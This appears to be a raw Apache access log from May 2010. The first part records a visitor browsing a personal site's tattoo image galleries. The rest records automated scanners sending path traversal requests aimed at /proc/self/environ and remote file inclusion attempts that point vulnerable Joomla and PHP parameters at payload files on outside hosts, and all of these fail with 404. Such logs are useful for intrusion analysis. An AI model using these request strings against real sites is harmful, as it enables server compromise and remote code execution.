85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:55 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:55 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:58 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:20 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:21 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:22 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:22 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:25 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:26 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:23:40 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:24:05 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:24:05 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:24:06 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:24:06 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
69.94.137.93 - - [30/May/2010:09:24:29 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:09:24:29 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:09:24:30 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:09:24:30 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.61.185.200 - - [30/May/2010:09:28:47 -0500] "GET /addevent.inc.php?agendax_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:09:28:53 -0500] "GET /logs/addevent.inc.php?agendax_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:09:29:01 -0500] "GET /logs/access_log.1271548800/addevent.inc.php?agendax_path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:29:07 -0500] "GET //config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:29:07 -0500] "GET /logs/access_log.1271894400//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:29:07 -0500] "GET /logs//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:29:07 -0500] "GET /logs/access_log.1272067200//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:33:03 -0500] "GET //config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:33:03 -0500] "GET /logs/access_log.1271894400//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:33:03 -0500] "GET /logs//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:33:03 -0500] "GET /logs/access_log.1272067200//config.inc.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:07 -0500] "GET //png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:08 -0500] "GET /logs/access_log.1271548800//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:08 -0500] "GET /logs//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:20 -0500] "GET /logs//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:21 -0500] "GET /logs/access_log.1271548800//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:35:21 -0500] "GET //png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:33 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [30/May/2010:09:35:35 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.127.70.140 - - [30/May/2010:09:35:35 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.127.70.140 - - [30/May/2010:09:35:35 -0500] "GET /logs/access_log.1271548800//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:40 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:42 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:42 -0500] "GET /logs/access_log.1274227200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:47 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
94.23.11.114 - - [30/May/2010:09:35:47 -0500] "GET /logs/access_log.1274227200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:36:13 -0500] "GET /logs/access_log.1271030400//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:09:36:17 -0500] "GET /logs/access_log.1271894400//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.199.198 - - [30/May/2010:09:36:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.166.213 - - [30/May/2010:09:37:36 -0500] "GET //png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.121.104.108 - - [30/May/2010:09:37:37 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:37:37 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:37:40 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:37:40 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:38:18 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:38:19 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
118.129.166.213 - - [30/May/2010:09:38:26 -0500] "GET /logs//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
118.129.166.213 - - [30/May/2010:09:38:26 -0500] "GET /logs/access_log.1271894400//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
118.129.166.213 - - [30/May/2010:09:38:26 -0500] "GET /logs/access_log.1271030400//png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.121.145.89 - - [30/May/2010:09:38:35 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:38:36 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
118.129.166.213 - - [30/May/2010:09:39:22 -0500] "GET //png.php?include_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.228.226.12 - - [30/May/2010:09:40:54 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:09:40:54 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:41:01 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.127.70.140 - - [30/May/2010:09:41:28 -0500] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.127.70.140 - - [30/May/2010:09:41:28 -0500] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.127.70.140 - - [30/May/2010:09:41:28 -0500] "GET /logs/access_log.1271548800//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
91.121.145.89 - - [30/May/2010:09:42:00 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:42:00 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
67.228.226.12 - - [30/May/2010:09:42:05 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:09:42:05 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:42:05 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.121.104.108 - - [30/May/2010:09:42:15 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:42:16 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
79.170.88.232 - - [30/May/2010:09:42:40 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 333 "-""Mozilla/5.0"
79.170.88.232 - - [30/May/2010:09:42:40 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.170.88.232 - - [30/May/2010:09:42:40 -0500] "GET /logs/access_log.1271548800//components/com_simpleboard/image_upload.php?sbp=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:42:55 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:43:03 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:43:06 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.113.201.109 - - [30/May/2010:09:43:10 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjadamowicz.com/includes/alias/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.113.201.109 - - [30/May/2010:09:43:10 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjadamowicz.com/includes/alias/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.113.201.109 - - [30/May/2010:09:43:10 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjadamowicz.com/includes/alias/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
91.121.145.89 - - [30/May/2010:09:43:27 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:43:27 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:43:43 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:43:43 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
74.55.65.134 - - [30/May/2010:09:45:11 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:45:19 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:45:52 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.113.201.109 - - [30/May/2010:09:46:19 -0500] "GET /logs/access_log.1273017600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tjadamowicz.com/includes/alias/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:47:16 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
